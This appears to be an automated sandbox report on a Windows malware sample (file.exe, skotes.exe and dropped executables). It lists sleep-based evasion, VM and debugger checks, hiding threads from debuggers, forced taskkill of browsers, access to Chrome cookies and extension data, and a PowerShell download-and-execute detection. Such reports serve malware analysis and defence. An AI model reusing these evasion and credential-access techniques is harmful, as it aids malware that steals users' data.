Source: C:\Users\user\Desktop\file.exe TID: 7584 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7684 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7576 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7928 Thread sleep count: 63 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7928 Thread sleep time: -126063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892 Thread sleep count: 306 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892 Thread sleep time: -9180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904 Thread sleep count: 65 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904 Thread sleep time: -130065s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7840 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7840 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7908 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7892 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2304 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2424 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 2260 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 4476 Thread sleep time: -42021s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe TID: 8044 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 2720 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 5652 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 7208 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 600 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe TID: 3888 Thread sleep time: -150000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56EBF0 PR_GetNumberOfProcessors,GetSystemInfo, 0_2_6C56EBF0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: skotes.exe, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, aedbd2e320.exe, 0000000F.00000002.2739870115.00000000011D7000.00000040.00000001.01000000.00000010.sdmp, 0718eb7837.exe, 00000010.00000002.3082015479.0000000000D9F000.00000040.00000001.01000000.0000000F.sdmp, aedbd2e320.exe, 00000020.00000002.2913543799.00000000011D7000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2129788119.0000000000796000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: file.exe, 00000000.00000002.2154371815.0000000023462000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8-
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWiVKY
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&!
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle.
Source: firefox.exe, 00000021.00000002.2897094701.000001396603A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZ
Source: firefox.exe, 00000021.00000002.2901769401.000001396681F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: skotes.exe, 0000000B.00000002.3095371206.00000000014DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW S
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3095371206.000000000150B000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.0000000001686000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 0000000F.00000002.2743981437.00000000016B5000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000162F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AEA000.00000004.00000020.00020000.00000000.sdmp, aedbd2e320.exe, 00000020.00000002.2919990948.0000000001B17000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901769401.0000013966810000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3159881754.0000024F65CA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001F.00000002.2903045103.0000023BA0918000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3256156843.0000024F6FC95000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: aedbd2e320.exe, 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarev
Source: firefox.exe, 0000001F.00000002.2897862516.0000023BA050A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: file.exe, 00000000.00000002.2130744682.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp, DocumentsKECFIDGCBF.exe, 00000009.00000002.2158417152.0000000000A0B000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2193747572.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp, aedbd2e320.exe, 0000000F.00000002.2739870115.00000000011D7000.00000040.00000001.01000000.00000010.sdmp, 0718eb7837.exe, 00000010.00000002.3082015479.0000000000D9F000.00000040.00000001.01000000.0000000F.sdmp, aedbd2e320.exe, 00000020.00000002.2913543799.00000000011D7000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001F.00000002.2903715752.0000023BA0D40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2901769401.000001396681F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2904900941.000001F1EE99D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Code function: 9_2_051F0733 rdtsc 9_2_051F0733
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C63AC62
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A2652B mov eax, dword ptr fs:[00000030h] 11_2_00A2652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A2A302 mov eax, dword ptr fs:[00000030h] 11_2_00A2A302
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C63AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe" Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C684760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6C684760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C561C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6C561C30
Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp, 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, file.exe, 00000000.00000002.2130744682.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: dProgram Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Program Manager
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: firefox.exe, 00000031.00000002.3092985841.000000AA349FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AE71 cpuid 0_2_6C63AE71
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Queries volume information: C:\ VolumeInformation
